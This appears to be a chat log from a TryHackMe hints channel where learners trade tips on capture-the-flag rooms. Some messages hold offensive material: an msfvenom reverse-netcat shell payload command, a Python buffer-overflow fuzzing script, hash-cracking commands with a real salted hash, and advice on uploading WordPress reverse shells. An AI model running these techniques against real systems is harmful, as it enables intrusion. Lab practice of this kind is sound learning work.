#room-hints

1 messages Β· Page 52 of 1

stuck fractal
#

@agile whale In the image

agile whale
#

hmmm OK

heavy anvil
#

is it first.txt or second.txt

#

were are you stuck?

agile whale
#

James are if you are referring to the string with that "!" and the password required to extract it that I already found that.

stuck fractal
#

Yea

#

zero width in that file

heavy anvil
#

@agile whale the last flag is hidden in an image

agile whale
#

yep I just found it

thin sorrel
#

For intro to x86 task 7 question 1 . I have tried to analyze what the binary does with the password i only noticed thst extra bytes are added .

white salmon
#

ok I give up ... but thank you for your help ☹️

agile whale
#

I didn't open the extracted file with a hex editor so didn't notice the extra data

#

at the time

stuck fractal
#

I didn't open the extracted file with a hex editor so didn't notice the extra data
@agile whale I have plugins for it, and I think my text editor picked up on it

heavy anvil
#

@white salmon sometimes taking some rest and starting a new is good

agile whale
#

I would have just cat the file at the time, didn't know cat supported unicode

white salmon
#

@heavy anvil certainly ... it's just that it's annoying to leave an incomplete room

stuck fractal
#

I would have just cat the file at the time, didn't know cat supported unicode
@agile whale Probably depends on your terminal

dull pulsar
#

hints on anonymous playground?

#

ive been trying the harder boxes but they seem to be very difficult

verbal wedge
#

Where are you stuck?

#

It's still new so hints will be sparse

grand pivot
#

hey everyone

#

im at smaggrotto and i have a trouble

stuck fractal
#

What's up?

grand pivot
#

i was trying to get in ||development.smag.thm/login.php|| and im not getting a response

#

i'd edit my hosts file

#

but nothing. I tried editing it a couples of times and copy-pasting the address

stuck fractal
#

What's in your hosts file?

grand pivot
#

but no luck

jagged musk
#

Reg :Tartarus , injecting !/bin/sh in the git privilege escalation, throwing !/bin/sh: not found error. Any one encountered this? Can anyone guide me ?

grand pivot
oblique cliff
#

You need the virtual host in there too

#

Reg :Tartarus , injecting !/bin/sh in the git privilege escalation, throwing !/bin/sh: not found error. Any one encountered this? Can anyone guide me ?
@jagged musk it’s called a shebang

#

Cuz the syntax is #!

jagged musk
#

trying now.

stuck fractal
#

So development.smag.thm is a subdomain of smag.thm. Using DNS, they can resolve to a different IP address or the same IP address. Your hosts file needs the subdomain, in order to make development.smag.thm actually resolve to the right IP @grand pivot

grand pivot
#

oh right

#

i forgot it

#

thanks

jagged musk
#

@jagged musk it’s called a shebang
@oblique cliff Thanks Sir Blob!

burnt cosmos
#

Might be too early to ask for a nudge on harder, but I've found the ||php files|| on the ||pwd domain||, but I've got no clue where to go from here

round rampart
#

What parameter allows us to generate a POC(actual exploit) in xsrfprobe ?

gusty hedge
#

Might be too early to ask for a nudge on harder, but I've found the ||php files|| on the ||pwd domain||, but I've got no clue where to go from here
@burnt cosmos
Just read the source code of the files and try to bypass the security functions

boreal wren
#

hi guys i need pointer for room harder....stuck at enumerating use gobuster, nikto but didnt find anything ! to get in

trim haven
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

trim haven
#

@boreal wren

gusty hedge
#

As mentioned in the description. Closely take a look at every request. Love the instant rule 13 messages xD

boreal wren
#

πŸ‘

lucid crescent
#

can someone tell me how to get password from that cipher text in anonymous playground room

glossy basin
#

Try ciphey

#

Also, do not ask questions about new rooms, please

lucid crescent
#

i dont think it is new room

#

past 4 days from launch of the room

verbal wedge
#

I can tell you Ciphey won't get it

#

Most likely

burnt cosmos
#

I haven't done the box so take my words with a grain of salt but cyberchef is always a shout

green merlin
#

Seeking a hint. I'm working on The Cod Caper - Task 5 - #3. Searched all files owned by pingu, no password found. Private key requires password. Am I missing something? Thanks

trim haven
#

Don't know how much of a hint you need but if the private key needs a password I'd look into ssh2john @green merlin

verbal wedge
#

It won't be on Cyberchef either

#

Jus sayin

fleet pike
#

Is the "harder" foothold a result of data mining/discovery, or an enumeration attack, or somethign else entirely

#

i've got the daemon versions, a list of users, a vhostname, a slew of useless cve's for said services.. I'm not sure if i'm supposed to tackle daemons, or try to brute force users .. but dont want an outright answer yet

gentle mural
#

harder is a new room, so I can only say: read the hints in the description carefully

chrome sand
#

Looking for a hint on: Set. I have a list of users, but not sure what to do with them except to brute force passwords, which does not seem correct.

white salmon
#

Can i ask about harder?

white salmon
#

I get stucked

toxic scarab
#

the room is only 1 day old. no hints or help yet

white salmon
#

It's okay

limber iron
#

anyone did the anonymous_v3 ?

stuck fractal
#

It's not a challenge box so

#

It's easier with hashcat IMO

gilded pasture
#

trying with john

stuck fractal
#

Then that link should help

gilded pasture
#

yep, checked, but i'm having problems with rockyou

stuck fractal
#

It's in there, just fine

gilded pasture
#

yep, but it's not working

#

john is not letting me use that

stuck fractal
#

make sure you're using --wordlist=/usr/share/rockyou.txt

#

you need --wordlist=

#

John is fussy

gilded pasture
#

.

stuck fractal
#

pg13

gilded pasture
#

wtf it's stopping immediatly

#

sorry

stuck fractal
#

DM me the contents of your hash file

#

I can confirm it will crack almost immediately tho

cursive timber
#

Geez I hope I m not just super blind but even with the hint I cant find the answer.. Completed the hole room except this one question..
Room: rpburpsuite
Would be great if someone could give me a hint

mortal kernel
#

I just did that

#

Further up the task, it mentions uses for comparer and how we can use it

#

What might be different for different users?

cursive timber
#

ugh I got it oof
thank you very much!pepehands

#

solved so much stuff before but failed at that ;D

mortal kernel
#

No problem. Glad you got it!

hardy matrix
#

Should i be using metasploit on easy ctf?

#

and I should be attacking the web server first righttt?

gusty hedge
#

I get stucked
@white salmon

Harder has a community write-up. The hints should be fine...it's all about enumeration.

white salmon
#

Thanks but i found some weird things

#

And where is?

stuck fractal
#

Writeups are on the room page.

gusty hedge
#

Told us about the weird things

white salmon
#

But i will try more

#

before read the writeup

gusty hedge
#

Checkout the "known issues" for this room too

white salmon
#

who made the known issues

#

he says .htb and we are in tryhackme lmao

stuck fractal
#

Harder was a rejected HackTheBox challenge box

gusty hedge
#

The machine contains breadcrumbs with htb TLD...bc it was rejected on htb. I will fix this later

white salmon
#

Ok i see

#

The room is realistic

gusty hedge
#

The hackthebox team was not able to deploy the target Linux distro...the content was fine.

white salmon
#

But the diffculty isn't medium, it's hard

gusty hedge
#

It was set to hard by me before releasing...the thm team decided to go medium

white salmon
#

lol

#

daily budge is easier than harder

#

and daily is harder

gusty hedge
#

Not my decision making

white salmon
#

Yes i know

#

Doesn't matter, the important is the room

wooden mist
#

some thm hard boxes are actually medium ones but this one is defo a medium one imo

patent citrus
#

Hi, anybody did here the https://tryhackme.com/room/malresearching room? I am stuck with Task4 Question2 (all the other questions have been solved), I have tested many answers and none of them worked. I don't know if it is a problem I have with the content or with the language (I am not native speaker)

gusty hedge
#

some thm hard boxes are actually medium ones but this one is defo a medium one imo
@wooden mist
Depends on your knowledge base...

patent citrus
#

I would like to have a small hint to knock this room

wooden mist
#

yes it does, but this really wasn't a hard one imho

wind fog
#

Hey lads

#

im currently on the ToolsRus room

#

and am having a problem with the final part, the Metasploit section

stuck fractal
#

Wrong LHOST

wind fog
#

I've taken a look at a guide and it's meant to connect to the session, any idea what I might be doing wrong?

stuck fractal
#

Wrong. LHOST.

mortal kernel
#

Can you show options?

wind fog
stuck fractal
#

It's just a wrong lhost!

wind fog
#

really? what is it meant to be?

stuck fractal
#

your VPN IP

wind fog
#

ah

mortal kernel
#

Your LHOST needs your match your tun0 IP

stuck fractal
#

You have it set to a virtualbox NAT IP

wind fog
#

alright, I get it

stuck fractal
#

The target can't talk to that

wind fog
#

which one should I use?

stuck fractal
#

None of those

#

Your VPN needs to be running in Kali

wind fog
#

hm?

stuck fractal
#

Not in Windows

wind fog
#

oh

#

really? I'm using a VM though

#

and I can enter into the site

mortal kernel
#

VPN runs in the VM

stuck fractal
#

But run it in the VM

mortal kernel
#

Grab your tun0 IP by throwing ip address into Terminal

stuck fractal
#

ip a s tun0

wind fog
#

says "tun0" doesn't exist

#

😦

stuck fractal
#

Yes

#

Because you need to run the VPN in Kali

wind fog
#

alright, let me try, thanks for the advice Ninja. 😻

stuck fractal
#

We told you that. So it's not going to work until you fix that πŸ˜‰

wind fog
#

πŸ˜‰

#

still no luck

#

I checked the fields and they're all correct

#

and "ip a s tun0" now works

stuck fractal
#

It's telling you something else is wrong

#

So check your ports and passwords

wind fog
#

any idea what it might be? cause everything here looks correct to me

stuck fractal
#

So check your ports and passwords
@stuck fractal

wind fog
#

isn't 1234 correct?

stuck fractal
#

I don't know. Check it.

wind fog
#

yep, it's correct

#

hmmm

#

πŸ€”

#

what is the lport for?

stuck fractal
#

Google it

#

metasploit what is lport

wind fog
#

doing that as we speak

grand pivot
#

hi everyone

#

im getting problems trying to get a meterpreter shell with a room

#

/hackpark

stuck fractal
#

Haha. Ha. Ha. Hackpark

grand pivot
stuck fractal
#

I'm not surprised tbh

#

How did you generate your shell?

grand pivot
#

its just dying

#

with msfvenom

stuck fractal
#

What payload did you generate?

grand pivot
#

||windows/x64/meterpreter/reverse_tcp||

stuck fractal
#

show options in your multi handler and paste a screenshot please

grand pivot
stuck fractal
#

Change the payload in multi handler to the same payload that you generated

patent token
#

and maybe try an unstaged payload if that doesn't work

grand pivot
#

Change the payload in multi handler to the same payload that you generated
@stuck fractal there it is!!!

wind fog
#

hey, do you think it might be something with my wifi that's causing my metasploit to not work?

grand pivot
#

sometimes i get stuck with just stupid things

wind fog
#

is that maybe possible?

#

😟

stuck fractal
#

@wind fog No. Because the VPN eliminates that.

grand pivot
#

thank you for your patience

stuck fractal
#

It's something that's got me before

wind fog
#

alright, I shall keep on investigating πŸ•΅οΈ

stuck fractal
#

Run the VPN troubleshooting script

wind fog
#

oh, it has one?

#

let me find it

stuck fractal
wind fog
#

I'm back again

stuck fractal
#

Reboot your VM

#

Make sure the VPN isn't running in Windows

#

Not in that order

wind fog
#

alright

#

holy fek! Yes, it finally worked! Only took 4 hours

#

thanks for the advice Ninja

#

you da best πŸ˜‰

mortal kernel
#

Heeyy you got it. Good on you. πŸ™‚

inner jackal
#

Exploiting Telnet. I have my Kali Machine with Vpn, telnet is ok, i can sniff traffic, on my local machine i execute: msfvenom -p cmd/unix/reverse_netcat lhost= "my kali vpn ip address" lport=4444 R

In the telnet session i execute .RUN the result of msfvenom, but nothing happens.

lucid crescent
#

i need help to cracking password in overpass2 can some one help me ??

#

||$ echo '$6$7GS5e.yv$HqIH5MthpGWpczr3................................GX.5PyMpzAYo3Cg/' > hash.hash
$ sudo john -w=rockyou.txt hash.hash
[sudo] password for secret:
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status||
it wont be crack will it need much time to crack??

keen willow
#

can playing fair could be a hint of anonymous ? lol, i am not asking for hints, but just confirming one.

oblique shuttle
lucid crescent
#

ok @oblique shuttle

obsidian fog
#

@lucid crescent also make sure that you are adding salt with the password. It should be cracked in max min or so.

lucid crescent
#

ok

median compass
#

hashcat might be easier @lucid crescent, with the salt it cracks in just a minute or less

keen willow
#

any good hint out on anonynous playground initial foothold ? i am out of ideas on decipher the lowercaseUppercase string.

woven mirage
#

check the names on the first page

keen willow
#

check the usernames
@woven mirage for me ?

woven mirage
#

@woven mirage for me ?
@keen willow yes

steady elm
#

Trying to solve overpass 2 and got stuck for 2 hours on the Task 1 last question to crack hash. I have found the hashes and pretty sure what mode i have to use with hashcat but dont know why it is not working
can anyone help?

lucid crescent
#

hashcat might be easier @lucid crescent, with the salt it cracks in just a minute or less
@median compass a peoblem with hashcat is my GPU

#

im not using GPU in my linux

#

so hashcat wont work

woven mirage
#

Trying to solve overpass 2 and got stuck for 2 hours on the Task 1 last question to crack hash. I have found the hashes and pretty sure what mode i have to use with hashcat but dont know why it is not working
can anyone help?
@steady elm are you putting the salt in the hash?

median compass
#

yes, but it doesn't have to check a lot, i ran it in the VM not on my host and it cracked just fine

#

i.e. no GPU

lucid crescent
#

ok maybe i will install graphic driver

steady elm
#

@steady elm are you putting the salt in the hash?
@woven mirage hashcat i am using 1710 and this is the hash $6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: I get token length exception error

lucid crescent
#

i.e. no GPU
@median compass hashcat is using GPU if u run it on ur own OS it wont work, else if u run it on ur vm it will work because ur vm has GPU and dont need driver

median compass
#

@median compass hashcat is using GPU if u run it on ur own OS it wont work, else if u run it on ur vm it will work because ur vm has GPU and dont need driver
@lucid crescent Pretty sure it will run on CPU too - https://hashcat.net/forum/thread-8269.html

lucid crescent
#

not sure but as i know it need GPU

median compass
#

@steady elm I don't recognise the hash you're trying to break there, that could be the problem

lucid crescent
#

i dont use hashcat really much

median compass
#

This is what I get when I run hashcat -I on my VM, no GPU to be seen
`
kali@dense merlin:~/Documents/TryHackMe/LookingGlass$ hashcat -I
hashcat (v6.0.0) starting...

OpenCL Info:

OpenCL Platform ID #1
Vendor..: The pocl project
Name....: Portable Computing Language
Version.: OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG

Backend Device ID #1
Type...........: CPU
Vendor.ID......: 1
Vendor.........: AuthenticAMD
Name...........: pthread-AMD Ryzen 7 2700X Eight-Core Processor
Version........: OpenCL 1.2 pocl HSTR: pthread-x86_64-pc-linux-gnu-znver1
Processor(s)...: 8
Clock..........: 3700
Memory.Total...: 10179 MB (limited to 4096 MB allocatable in one block)
Memory.Free....: 10115 MB
OpenCL.Version.: OpenCL C 1.2 pocl
Driver.Version.: 1.5
`

#

anyway, doesn't matter I guess, if it doesn't work for you it doesn't work! πŸ™‚

woven mirage
#

@woven mirage hashcat i am using 1710 and this is the hash $6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: I get token length exception error
@steady elm ah sorry, i though you were speaking about another question

#

not all hashes you will be able to break

#

the question asks how many you can break

#

and also the hash is not that long

#

:18464:0:99999:7::: this isn't a part of the hash

keen willow
#

@keen willow yes
@woven mirage shall i consider it to the reply of my msg (i.e. decipher lowercaseUppercase), or a brand new hint ?

woven mirage
#

a reply to the message

#

you know how one character is decoded

#

try to guess wich word could be made from the characters you know and then find a logic to discover the rest

verbal wedge
#

I'm just glad people figured it out lol

fossil iris
#

Hi, may i have some question about box HaskHell?

#

I try to upload the reverse shell in directory ||submit|| however I got this error?

oblique cliff
#

What format is your file

fossil iris
#

haskell file

#

.hs

oblique cliff
#

Were you able to get the server to run any other Haskell files?

fossil iris
#

let me try

eternal brook
#

Can we ask hints for harder rn?

woven mirage
#

well the room has a writeup accepted doesnt it?

trim haven
#

I believe you can @eternal brook

eternal brook
#

Don't wanna see the write-up now...

#

Oh ok

woven mirage
#

well the room has a writeup accepted doesnt it?
@woven mirage just clarifying that this message looks like i'm telling you to check the writeup, i meant to say that if it has a writeup accepted you can ask questions

eternal brook
#

Yeah I also saw that rn

#

It's a new room so I thought maybe like other rooms write-ups and questions will be closed for a while

quiet yarrow
#

can anyone tell me if i am doing something wrong

stuck fractal
#

Yes you did

#

You downloaded the web page rather than downloading the file @quiet yarrow

quiet yarrow
#

ohhhh ok

#

thanks james

eternal brook
#

So yeah I haven't got much out from the room I see lot of for that eventually look all the same || I just saw one kinda re direction to port 8080 /vendor || so re scanned the port is closed ran a script to scan all those dirs again but can't find anything useful...

#

Harder is the room

woven mirage
#

check the http requests

#

there is something on the requests that isnt being used by the website but gives useful info

eternal brook
#

Ohk alright thanks I'll check :)

#

Got it thanks termack :)

#

Just a question is that supposed to be real?

#

Like box says it's similar to real world pentest...

woven mirage
#

the creator of the box said it is

stuck fractal
woven mirage
#

^

hasty zodiac
#

Anyone who could give me a hint for VulnVersity Recon?
Using the nmap flag -n what will it not resolve?

trim haven
#

man nmap

hasty zodiac
#

In the time I read the manpage, the machine will go down πŸ˜…

stuck fractal
#

Extend it.

hasty zodiac
#

ohhhhhhhhhhhhhhhhhhhhh

#

thanks Jabba pepeHeart

limber iron
#

Hints on the Anonymous_v3 ?

trim haven
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
stuck fractal
#

Also, that's the machine title rather than the room name

#

Use the room name or room code

limber iron
#

Okey sure, i'm currently decrypting the cipher, i know the pattern used and i know the user involved.

atomic shuttle
#

can i pm you on looking-glass @lusty wigeon ? im at the final user. still enumerating

lusty wigeon
#

i don't wanna spam rule13 but lets just wait till the day end before hints

eternal timber
#

Found a box that seems to have a brute force (brute force on an SSH port with a known user). The next flag is a password of 7 characters so I'm assuming it will just be a weak creds within top 10k or something like that.

I can brute force every 7char password from the top 10million passwords, but any suggestions before I start off a big ol hydra brute force?

atomic shuttle
#

aa sure, i'll give myself somemore time to enumerate

real rock
#

So please slap me on the back of the hand if this question doesn't belong here. This isn't so much to get an answer as I don't quit get a comment made. In "HTTP Web Fundamentals @stuck fractal says, "you can tell I performed the request from (chrome version 80, from Windows 10)...

My issue is I do see that but I also see Mozilla, Safari etc... I think its supposed to be so obvious that I can't find info only to explain this but its going over my head.

stuck fractal
#

@eternal timber Room?

real rock
eternal timber
stuck fractal
#

It's the User Agent, it tells the server a bunch of stuff @real rock

#

@eternal timber Try some brute force them

#

In rockyou

eternal timber
#

Yeah I assumed as much

#

Just wanted to see if there was something I was missing before I just threw a brute force at it lol

stuck fractal
#

@real rock So it's the bit that says Chrome 80

real rock
#

Yeah I see the User-Agent but the first thing I see after is Mozilla

stuck fractal
#

There's a breakdown of what each part means

real rock
#

Oh wow thank you Ninja

stuck fractal
#

Mozilla docs are wonderful

real rock
#

I will do that one immediately

#

Ty, favorited the website

keen willow
#

i am not able to overflow gatekeeper binary, while sending data by 'nc' it works well, but when i try to do it with python only sending works.

#

anyone willing to help, i can provide screenshots.

oblique cliff
#

Sure screenshots

limber iron
#

No one wants to help ? okay thanks.

eternal timber
#

@stuck fractal Yeah, rockyou got it pretty quick, also TIL rockyou has 2.5 million 7 character passwords in it

stuck fractal
#

Typically for THM, brute force is meant to take under 5 minutes

#

Definitely with any newer boxes

eternal timber
#

Yeah, any challenges I make (outside of THM) I try to stray away from brute force due to the uncertantiy of it.

oblique cliff
#

What about port scanning? @stuck fractal kekw

stuck fractal
#

Hey, that's not in the rule @oblique cliff

#

Your fault for not using threader or rustscan

oblique cliff
#

I do use threader

#

Jokes on you

stuck fractal
#

Be glad I didn't set it to 10k

oblique cliff
#

Jokes double on you cuz I just don’t attempt your boxes until months after they’re out cuz I’m a dumb dumb

keen willow
#

i see bytes sent.

oblique cliff
#

Show the commands you’re using not just the output

keen willow
#

nc IP PORT

oblique cliff
#

The python commands

keen willow
#

`#!/usr/bin/python
import sys,socket,time
from time import sleep

buffer = "A" * 50

while True:
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(5)
s.connect(('IP_ADDR', 31337))
print "sending %s bytes \r\n" % str(len(buffer))
s.send(buffer)
s.recv(1024)
s.close()
buffer = buffer + ("A" * 50);
except Exception as e:
print e
print "Fuzzing crashed at %s bytes" % str(len(buffer))
sys.exit()
time.sleep(1)
`

oblique cliff
#

Screenshots are so much better 😱

keen willow
oblique cliff
#

whats the IP address youre using

#

and whats the output of the python script youre running

keen willow
#

ip address is of my VM, that is correct, coz i can see output on immunity debugger. as gatekeeper is not sending response, so there is no output on python

shut pollen
#

Any help with Anonymous ?

mint parcel
#

you have to be more specific about what's giving you a hard time

trim haven
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
hasty zodiac
#

Anyone who could point me in the right direction with the second key of Mr. Robot CTF?
I don't really know where I could find ||White coloured font||

oblique cliff
#

ip address is of my VM, that is correct, coz i can see output on immunity debugger. as gatekeeper is not sending response, so there is no output on python
@keen willow Are you running gatekeeper on your host OS, a VM, or THM

#

Anyone who could point me in the right direction with the second key of Mr. Robot CTF?
I don't really know where I could find ||White coloured font||
@hasty zodiac hey I’d be happy to, could you answer those question jabba just asked so I don’t repeat something you may have already tried?

hasty zodiac
#

Well, I can't without really spoiling how to get the first key.

shut pollen
#

Need a lil help with the || bOF of Anonymous Playground || , I was able to call the hidden function but || how do I get the shell because everytime I run the binary || , it just prints the message and exits with || Segmentation Fault ||

trim haven
#

Blob just means what you have tried for the second key.

oblique cliff
#

Spoiler text works fine

keen willow
#

@keen willow Are you running gatekeeper on your host OS, a VM, or THM
@oblique cliff running gatekeeper and immunity debugger on VM and connecting it from kali (host)

shut pollen
#

@mint parcel

oblique cliff
#

Blob just means what you have tried for the second key.
@trim haven you finally called me blob! 😍😍😭😭😭😭😭😱😭

trim haven
#

Oh, it seems I have.

hasty zodiac
#

Well, checking through every command and page source.

mint parcel
#

@shut pollen ?

oblique cliff
#

@keen willow can you dm me. A bit cluttered in here

hasty zodiac
#

And looked through the other file next to the one containing the first key

oblique cliff
#

Did you directory bust?

hasty zodiac
#

oh shoot

oblique cliff
#

Yep all good so far. Enumerate the possible subdirectories?

shut pollen
#

@mint parcel > you have to be more specific about what's giving you a hard time

Help with Anonymous ?

oblique cliff
#

πŸ™‚

hasty zodiac
#

Forgot about that... thanks... I'll try that!

#

guess it's the ||wp-login|| LaughPepe

oblique cliff
#

Wouldn’t be a bad place to start

mint parcel
#

@shut pollen hmm.. i had the same problem... If i recall correctly,|| if you call the function address it just exit without getting a shell... try pointing it to the next instruction||

shut pollen
#

|| Instructions as in the c*****sh function ? ||

hasty zodiac
#

I don't feel like that's supposed to be part of the experience though, Blob.

oblique cliff
#

You don’t think a Wordpress subdirectory that’s been set up on a purposely vulnerable box is part of the experience of pwning the box...?

hasty zodiac
#

Well, that indeed sounds foolish.

oblique cliff
#

Haha

#

I promise it’s part of it πŸ™‚

hasty zodiac
#

Just a quick thing.

#

I don't have to do wp-scan right?

oblique cliff
#

Is that wp’s brute forcer tool?

hasty zodiac
#

finds vulns in WP

oblique cliff
#

No

hasty zodiac
#

lets say in outdated versions, plugins, etc

oblique cliff
#

You don’t need that

hasty zodiac
#

alright

#

ooo, found interesting stuff

#

I'm now at ||another key?||

arctic crystal
#

@hasty zodiac you are going right way keep working in that direction

hasty zodiac
#

hmm

#

problem is the direction

arctic crystal
#

you may have got the first key I assume?

hasty zodiac
#

yeah

#

wait

#

the other file

arctic crystal
#

ya check that

hasty zodiac
#

hmm

#

dunno if I'm just dumb

oblique cliff
#

youre not

#

the box isnt easy

#

what have you tried, what are you stuck on, etc?

hasty zodiac
#

||another key?|| | looked through the other file ||fsocity.dic|| using keywords

arctic crystal
#

here is a hint for you
you won't get other two keys unless you get a shell on the target machine

#

there is no second key hidden in web pages

hasty zodiac
#

god damn it

arctic crystal
#

you need to find your way in

hasty zodiac
#

||so basically upload a shell||

oblique cliff
#

not sure how many CTFs you done, but wordpress usually requires credentials to get access and then upload a shell

#

work on getting the credentials πŸ™‚

hasty zodiac
#

yeah I have access

#

I just didnt know I needed to get into the box

#

||I can just add a shell through plugins, right?||

oblique cliff
#

yes

#

several ways to do it

arctic crystal
#

just google wordpress reverse shell you'll find many articles on how to do it

hasty zodiac
#

imma just upload a b374k shell pepesweat

keen willow
#

@keen willow can you dm me. A bit cluttered in here
@oblique cliff thanks for help πŸ‘

hasty zodiac
#

hello there person who found me.

oblique cliff
#

youre welcome πŸ™‚

mossy ermine
#

Hi! I've found myself stucked at the beginning of the wgel ctf room. I bruteforced all the directories and I tried to find an exploit for the apache version running but It doesn't work. Any hint would be very appreciated πŸ˜‹

hasty zodiac
#

Yeah, thanks. It was a misleading hint for the second key imo anipepehands

oblique cliff
#

indeed

hasty zodiac
#

now I just need to dig up the keys

oblique cliff
#

Hi! I've found myself stucked at the beginning of the wgel ctf room. I bruteforced all the directories and I tried to find an exploit for the apache version running but It doesn't work. Any hint would be very appreciated πŸ˜‹
@mossy ermine did you find anything when directory busting?

mossy ermine
#

@mossy ermine did you find anything when directory busting?
@oblique cliff The most interesting things are || /sitemap || and || sitemap/images sitemap/sass /sitemap/fonts sitemap/js sitemap/css ||

#

The other results are html pages for a site template

oblique cliff
#

try directory busting again on that interesting thing

#

you're also missing something when it comes to the apache page πŸ™‚

tepid flame
#

Hey, I think I might have found an issue with one of the rooms. Can anyone confirm?

oblique cliff
#

preferably with screenshots and a detailed description of the issue

tepid flame
#

alright, thanks you.

hasty zodiac
#

damn, I do need privilege escalation 😦

oblique cliff
#

yes.

hasty zodiac
#

2nd key done party

oblique cliff
#

πŸ”₯

hasty zodiac
#

3rd key was easier

#

the biggest struggle was the second key smh

#

thought it all had to do something with the webapp

mossy ermine
#

@> you're also missing something when it comes to the apache page πŸ™‚
@oblique cliff done. Got the || username || on || index.html || but I really don't find any other subdirs of || sitemap || . I tried all the directories lists that come pre-installed on kali linux

hasty zodiac
#

only got 90 points? others got 210 anipepehands

oblique cliff
#

hmmmm are you sure you directory busted properly...?

#

you should definitely be finding something else

mossy ermine
#

Oh > hmmmm are you sure you directory busted properly...?
@oblique cliff Wait, I realized only now that there's another directory on kali that contains dir lists. I'm going to check with them

oblique cliff
hasty zodiac
#

honestly idk if I'm ready for another one

#

any good rooms?

mossy ermine
#

kekw
@oblique cliff Lol, damn the || .ssh || directory

stuck fractal
#

I'd do some walkthrough rooms tbh

hasty zodiac
#

huh?

oblique cliff
#

walkthrough rooms

#

rooms that walk you through the tasks and steps

#

to help teach you

#

to inject knowledge into your brain

stuck fractal
#

Eg new tools, new vulns

hasty zodiac
#

Well, I was asking for any rooms. Even walkthrough ones.
Specific ones.

stuck fractal
#

Your dashboard has a few that are suggested

#

In order

hasty zodiac
#

Well, I'll go with metasploit then pepeshrug .

jagged scaffold
#

hey i'm doing crack the hash room using hashcat ...
and in one question i'm given with 1)hash , 2) salt, 3) rounds
is there any way i could use these 2 extra values to speed up the process ?

trim haven
#

If you're cracking the hash without formatting the salt etc. you won't get an asnwer

jagged scaffold
#

ohkay , i'll try that

#

and any other way to crack the hash of $2y = bycrpt ?? i read that this one takes hell of a time ..

fleet pike
#

brypt hacking is pretty horrible

#

its designed to be costly (cpu wise)

stuck fractal
#

It's possible

#

Use some logic and only try passwords with the correct length from rockyou

fleet pike
#

Also i remember people saying that if a BF takes longer than 10 mins (usually, re: THM rooms) you are doing it wrong... I tried 50k passwrods last night across 12 different accounts and couldn't crack this ssh .. so i think that i'm not supposed to brute force

#

so maybe you want to limit it to the top 100k lines of rockyou?

stuck fractal
#

Just filter rockyou down to 4char passwords

jagged scaffold
#

system hungup lol

oblique shuttle
#

hi all.. trying a buffer overflow but cant overflow the buffer enough to write into eip instruction pointer... I can overwrite ebp basepointer but this get push when the programme tries to return. Anyone got any tips for overflowing to call a specific function address?

white salmon
oblique cliff
#

hi all.. trying a buffer overflow but cant overflow the buffer enough to write into eip instruction pointer... I can overwrite ebp basepointer but this get push when the programme tries to return. Anyone got any tips for overflowing to call a specific function address?
@oblique shuttle if you can overflow the ebp, you can probably get to the return address. What happens when you try to keep going?

oblique shuttle
#

i've tried a massive input (2000 chars) but nothing seems to touch the eip...

oblique cliff
#

which room is this?

#

and if you overflow it too much the return address is going to point to a segmentation fault (i think), so you cant just way overshoot and expect your overflow to be in the return address

white salmon
#

i've tried a massive input (2000 chars) but nothing seems to touch the eip...
@oblique shuttle run it with breakpoints in debugger? check for bad chars? jump to different address?

oblique shuttle
#

@oblique cliff anonymous

oblique cliff
#

oh, i havent done that room so idk if he did something screwy with it

white salmon
#

try jumping to a different address

#

It worked fine for me

#

You get segfault with ||80 chars||

oblique shuttle
#

@white salmon can i dm?

white salmon
#

sure

errant monolith
#

@stuck fractal thx for the new room it's realy cool ^^

stuck fractal
#

You're welcome

somber crag
#

yes the foodhold part is really funny, now I am a bit stuck with the privesc :/

stuck fractal
#

No hints yet.

somber crag
#

I know. Im pretty sure that I am missing smh but I will root it ^^

frail void
#

yes the foodhold part is really funny, now I am a bit stuck with the privesc :/
@somber crag Dude same. I've been stuck on it since the day it came out lol. It's driving me a little up the wall. I feel like I'm making a simple mistake but don't know what.

fleet pike
#

Ditto

fleet pike
#

Okay, i've managed to secure what looks like a plaintext password and username, and hostname... I tried to ssh to the host, and the username and/or password dont jibe.

I added the hosts, and i'm trying to get in, and the server is pretending it does not exist.. like literally, that vhost does not work. I hit the wall

stuck fractal
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
fleet pike
#

otoh, the url given divulges where the box came from

stuck fractal
#

I'll be honest, there's a line between a hints chat and a "I'll talk to myself while working through the box" chat

#

This isn't that second part

fleet pike
#

Is there a person responsibel for creating the box, or adapting it to THM

#

(Harder)

stuck fractal
#

Yes. The box has a creator

#

It was a rejected HTB box

fleet pike
#

I talk in TS, its not the right channel, no hints, no room help. i get it. asides from getting a pointer to Muir for typo correction. I do not know who posted it .. Its very excellent so far, but it has a critical flaw in its port

stuck fractal
#

They're also here in the discord

#

If you read the channel topics, they describe exactly what the channels are meant for.

#

